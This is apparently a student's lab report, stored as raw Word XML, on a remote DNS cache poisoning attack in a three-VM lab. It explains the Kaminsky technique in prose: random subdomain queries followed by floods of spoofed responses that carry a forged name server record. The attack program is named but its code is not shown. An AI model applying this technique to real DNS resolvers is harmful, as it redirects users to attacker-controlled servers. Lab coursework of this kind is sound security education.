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60C2FC" w14:textId="77777777" w:rsidR="00A26AFB" w:rsidRDefault="006D3FFA">
      <w:r>
        <w:t>CSE644 Lab6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46250DF2" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA">
      <w:r>
        <w:t>Yishi Lu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694D2EF" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA">
      <w:r>
        <w:t>3/23/2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666CE261" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA"/>
    <w:p w14:paraId="7A358EFB" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:r>
        <w:t>In this task, I use three VMs, they are VM1, VM2, and VM3. They are all in the same NatNetwork.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB3B07" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:r>
        <w:t>VM1, it has IP address 10.0.2.20, it is the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D46185" w14:textId="61E0AD22" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:r>
        <w:t xml:space="preserve">VM2, it has IP address 10.0.2.21, it is the </w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r>
        <w:t>server machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE0D66" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:r>
        <w:t>VM3, it has IP address 10.0.2.25, it is the user machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AABD8AA" w14:textId="6DA3B305" w:rsidR="008663AD" w:rsidRDefault="008663AD" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="1C82ED8E" w14:textId="65E02A63" w:rsidR="00B105B4" w:rsidRDefault="00B105B4" w:rsidP="006D3FFA">
      <w:r>
        <w:t>Before doing attack, I follow the steps on the lab description to configure all machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF28E86" w14:textId="77777777" w:rsidR="00F4009C" w:rsidRDefault="00F4009C" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="6961811F" w14:textId="6374451F" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008663AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task1:</w:t>
      </w:r>
      <w:r w:rsidR="00876675">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Cache Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECC5D7B" w14:textId="0A79B073" w:rsidR="00980D35" w:rsidRDefault="005830B5" w:rsidP="006D3FFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D4E4028" wp14:editId="1AA36C2D">
            <wp:extent cx="5923280" cy="741680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Picture 25" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.26.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3-23%20at%207.26.44%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3280" cy="741680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C893124" w14:textId="263270AF" w:rsidR="00980D35" w:rsidRPr="00980D35" w:rsidRDefault="00980D35" w:rsidP="006D3FFA">
      <w:r w:rsidRPr="00980D35">
        <w:t>screenshot0 on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VM2. Before attack, I clean up the cache of the DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01B21D" w14:textId="435B3307" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="481ADD0C" w14:textId="3E26F299" w:rsidR="006D3FFA" w:rsidRDefault="00B27677" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4667C18C" wp14:editId="7766CF2D">
            <wp:extent cx="5939790" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="26" name="Picture 26" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.28.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3-23%20at%207.28.52%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9790" cy="733425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="499EFF62" w14:textId="02F23BC4" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:r>
        <w:t xml:space="preserve">screenshot1 on VM1 (attacker). Running the DNS </w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">attack </w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t>program on VM1 to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> start our attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B82D43" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="58DADE8B" w14:textId="7A4602F1" w:rsidR="001C4CBF" w:rsidRDefault="001C4CBF" w:rsidP="006D3FFA">
      <w:r>
        <w:t>One example of my DNS query packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EDC68A" w14:textId="367429F1" w:rsidR="001C4CBF" w:rsidRDefault="00B27677" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77DBA099" wp14:editId="4D4BAF2D">
            <wp:extent cx="5923280" cy="3344545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="27" name="Picture 27" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.31.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3-23%20at%207.31.31%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3280" cy="3344545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD5B4C" w14:textId="6368D15D" w:rsidR="006D3FFA" w:rsidRDefault="00445F42" w:rsidP="006D3FFA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>One e</w:t>
      </w:r>
      <w:r w:rsidR="006D3FFA">
        <w:t xml:space="preserve">xample of my DNS </w:t>
      </w:r>
      <w:r>
        <w:t>response</w:t>
      </w:r>
      <w:r w:rsidR="006D3FFA">
        <w:t xml:space="preserve"> packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44946B78" w14:textId="3EDF79A7" w:rsidR="006D3FFA" w:rsidRDefault="00B27677" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B21128A" wp14:editId="4CD5BDCF">
            <wp:extent cx="5923280" cy="3361055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Picture 28" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.32.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3-23%20at%207.32.06%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3280" cy="3361055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEBB3FD" w14:textId="76A3ECC4" w:rsidR="006D3FFA" w:rsidRDefault="00B27677" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E4E1039" wp14:editId="27C97540">
            <wp:extent cx="5923280" cy="3361055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="Picture 29" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.33.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3-23%20at%207.33.20%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3280" cy="3361055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D3301" w14:textId="541613BC" w:rsidR="0046416A" w:rsidRDefault="00B27677" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A7DD125" wp14:editId="080572E9">
            <wp:extent cx="5923280" cy="3361055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="Picture 30" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.33.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3-23%20at%207.33.52%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3280" cy="3361055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="496498C6" w14:textId="7AA51088" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:r>
        <w:t xml:space="preserve">screenshot2. Wireshark captures the DNS </w:t>
      </w:r>
      <w:r w:rsidR="001C4CBF">
        <w:t xml:space="preserve">query and </w:t>
      </w:r>
      <w:r>
        <w:t>response packet</w:t>
      </w:r>
      <w:r w:rsidR="001C4CBF">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sent from VM1 to VM2, the above screenshot shows whole information contained in the DNS </w:t>
      </w:r>
      <w:r w:rsidR="001C4CBF">
        <w:t xml:space="preserve">query and </w:t>
      </w:r>
      <w:r>
        <w:t>response packet</w:t>
      </w:r>
      <w:r w:rsidR="001C4CBF">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3345AFAF" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="1371988E" w14:textId="579E7AF7" w:rsidR="006D3FFA" w:rsidRDefault="00B27677" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DB4C034" wp14:editId="22775903">
            <wp:extent cx="5923280" cy="1318260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="31" name="Picture 31" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.34.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3-23%20at%207.34.59%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3280" cy="1318260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEDAA6F" w14:textId="2179C2D7" w:rsidR="0020196F" w:rsidRDefault="0020196F" w:rsidP="006D3FFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>creenshot</w:t>
      </w:r>
      <w:r>
        <w:t>3.1 on VM2. Periodically check the dump.db file</w:t>
      </w:r>
      <w:r w:rsidR="00B67E1A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">on VM2 </w:t>
      </w:r>
      <w:r w:rsidR="00B67E1A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">to see if the DNS server </w:t>
      </w:r>
      <w:r w:rsidR="003F3591">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">cache </w:t>
      </w:r>
      <w:r w:rsidR="00B67E1A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="000E40B3">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>poisoned or not</w:t>
      </w:r>
      <w:r w:rsidR="00276512">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. After some tries, our server name is cached in the local DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1EE512" w14:textId="77777777" w:rsidR="001C4CBF" w:rsidRDefault="001C4CBF" w:rsidP="006D3FFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07F63A1C" w14:textId="14D0472F" w:rsidR="006D3FFA" w:rsidRDefault="00B27677" w:rsidP="006D3FFA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="567528E2" wp14:editId="6717BD91">
            <wp:extent cx="5923280" cy="3369310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="32" name="Picture 32" descr="../../../Desktop/Screen%20Shot%202018-03-23%20at%207.35.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3-23%20at%207.35.36%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280" cy="3369310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1FF255" w14:textId="15095EAD" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:r>
        <w:t>screenshot3</w:t>
      </w:r>
      <w:r w:rsidR="0020196F">
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="00276512">
        <w:t xml:space="preserve"> on VM2. After we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run the DNS program a while, we successfully poisoned cache</w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="003F3591">
        <w:t xml:space="preserve">the DNS server </w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t>VM2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003F3F51">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0004138E">
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="003F3F51">
        <w:t xml:space="preserve"> our attack is successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A05629" w14:textId="77777777" w:rsidR="006D3FFA" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA"/>
    <w:p w14:paraId="1E875C83" w14:textId="2943C49B" w:rsidR="0020196F" w:rsidRPr="0020196F" w:rsidRDefault="006D3FFA" w:rsidP="006D3FFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020196F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
      <w:r w:rsidR="0020196F">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="008DEEC7" w14:textId="3750B130" w:rsidR="008663AD" w:rsidRDefault="008663AD" w:rsidP="0020196F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In this task, we want to perform the remote DNS cache poisoning attack; </w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t>so,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> after attack, the DNS server</w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t xml:space="preserve"> should</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t>cache</w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t xml:space="preserve"> ns.dnslabattacker.net as the name server for the domain example.com</w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t xml:space="preserve"> in authority section</w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE8373" w14:textId="095D77C7" w:rsidR="006D3FFA" w:rsidRDefault="0020196F" w:rsidP="0020196F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Firstly, we followed the steps on the lab description to configure the attacker machine (VM1) and DNS server (VM2). Afterwards, </w:t>
      </w:r>
      <w:r w:rsidR="000F14A8">
        <w:t xml:space="preserve">we clean up the DNS server cache (screenshot0). And then </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we run the </w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t>attacking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> program (udp.c) on the attacker machine (screenshot1). And then we need to wait until a forged DNS response is accepted by the DNS server. After the </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidR="00C55FC1">
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accepted one of our forged DNS response, we can open the dump.db file to confirm that the DNS server cache is poisoned. As the screenshot3.2 shows, </w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t>VM2 cached ns.dnslabattacker.net as the name server for the domain example.com. Therefore, our attack is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512D016B" w14:textId="491A1218" w:rsidR="00BB4782" w:rsidRDefault="00097D29" w:rsidP="0020196F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For this task, there are several important things. </w:t>
      </w:r>
      <w:r w:rsidR="00BB4782">
        <w:t>The first one is the mechanism of the attack. When the DNS server receives a query, and it does not have the answer; it will send DNS query to the other DNS server on the internet</w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t xml:space="preserve"> for asking answer</w:t>
      </w:r>
      <w:r w:rsidR="00BB4782">
        <w:t xml:space="preserve">. If the attacker’s spoofed DNS response reaches the DNS server earlier than the real DNS response, then the spoofed response will be accepted by the DNS server. However, </w:t>
      </w:r>
      <w:r w:rsidR="00F52B24">
        <w:t xml:space="preserve">there is a problem, when the attacker and the DNS server are not in the same local network, </w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t>the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00AD449F">
        <w:t xml:space="preserve"> cannot </w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidR="00AD449F">
        <w:t xml:space="preserve"> transaction ID</w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t xml:space="preserve"> by sniffing</w:t>
      </w:r>
      <w:r w:rsidR="00AD449F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t xml:space="preserve">so the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t>try 2^16 different transaction ID</w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve"> (in this lab</w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve"> port number is fixed, so we just ignore it)</w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t xml:space="preserve">. But this lead to another problem, when the DNS server receives a query, it will ask other DNS server for answer. Once it receives the answer, it will cache the answer for hours, days, even months. Then the attacker can only have one chance to try, it seems impossible to </w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve">make the attack </w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t xml:space="preserve">succeed. With Kaminsky </w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t>algorithm</w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t xml:space="preserve">, the problem is solved. Instead sending query of </w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t>desired domain (i.e. example.com)</w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t>, we can send query about</w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve"> fake subdomain</w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">aaaaa.example.com. After the DNS server send </w:t>
      </w:r>
      <w:r w:rsidR="00730A00">
        <w:t>query</w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t xml:space="preserve"> to other DNS servers</w:t>
      </w:r>
      <w:r w:rsidR="00730A00">
        <w:t xml:space="preserve">, we continuously send spoofed DNS </w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t>responses</w:t>
      </w:r>
      <w:r w:rsidR="00730A00">
        <w:t xml:space="preserve"> with different transaction ID</w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00730A00">
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidR="00730A00">
        <w:t xml:space="preserve">DNS server. In the spoofed DNS response, it contains the </w:t>
      </w:r>
      <w:r w:rsidR="00276512">
        <w:t>forged</w:t>
      </w:r>
      <w:r w:rsidR="00730A00">
        <w:t xml:space="preserve"> name</w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00730A00">
        <w:t>server record. If the DNS server accepts the real DNS response, we can generate another query with different subdomain, and try again. So, with this mechanism, the attacker has many chances to try. If the forged DNS response is accepted by the DNS server, the forged name</w:t>
      </w:r>
      <w:r w:rsidR="00445F42">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00730A00">
        <w:t>server recor</w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve">d will be cached in the server. Then if a user asks the IP address of the example.com to the DNS </w:t>
      </w:r>
      <w:r w:rsidR="00C55FC1">
        <w:t>server, because the forged name</w:t>
      </w:r>
      <w:r w:rsidR="007E0820">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve">server is cashed, the DNS server will directly ask the forged name server for the IP address. </w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t xml:space="preserve">Because </w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve">the forged name server is belonged to the attacker, </w:t>
      </w:r>
      <w:r w:rsidR="00C55FC1">
        <w:t>the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve"> can reply anything he want. After the DNS server receives the </w:t>
      </w:r>
      <w:r w:rsidR="00C55FC1">
        <w:t xml:space="preserve">forged </w:t>
      </w:r>
      <w:r w:rsidR="00DD773C">
        <w:t xml:space="preserve">answer from the attacker, it will return the forged answer to the user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3577677E" w14:textId="63631250" w:rsidR="00097D29" w:rsidRDefault="00BB4782" w:rsidP="0020196F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Another</w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t xml:space="preserve"> important </w:t>
      </w:r>
      <w:r>
        <w:t>thing</w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t>DNS attack</w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t xml:space="preserve"> program.</w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t xml:space="preserve"> This program is used to forge and send DNS query and response to the </w:t>
      </w:r>
      <w:r w:rsidR="007E0820">
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidR="0077510C">
        <w:t>DNS server.</w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t>After we run the program on VM1. The program generates an DNS query firstly</w:t>
      </w:r>
      <w:r w:rsidR="007E0820">
        <w:t xml:space="preserve"> (with subdomain name of example.com, i.e. aaaaa.example.com)</w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t>, and then it sends the query to the DNS server. Afterwards, it will generate 2^16 DNS response packets</w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:t xml:space="preserve"> corresponding to the DNS query</w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t>, and each of them has different transaction ID. Of course, all these DNS responses will be sent to DNS server as well. If none of these DNS response</w:t>
      </w:r>
      <w:r w:rsidR="007E0820">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00097D29">
        <w:t xml:space="preserve"> is accepted by the DNS server, then the program will generate another DNS query with </w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:t>different subdomain name of example.com (i.e. aaaab.example.com), and then it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> generates another 2^16 DNS response and send to the DNS server</w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">It will keep </w:t>
      </w:r>
      <w:r w:rsidR="00C55FC1">
        <w:t xml:space="preserve">doing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">such procedure until </w:t>
      </w:r>
      <w:r w:rsidR="00C55FC1">
        <w:t>one forged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS response is accepted by the DNS server. </w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:t>If one of the DNS response is accepted by the DNS server, then we can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stop the program and</w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:t xml:space="preserve"> check the dump.db file of the DNS server. We should see that “example.com NS ns.dnslabattacker.net” is </w:t>
      </w:r>
      <w:r w:rsidR="00855997">
        <w:t>cached</w:t>
      </w:r>
      <w:r w:rsidR="005B34AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E0820">
        <w:t>in this file (screenshot3.2)</w:t>
      </w:r>
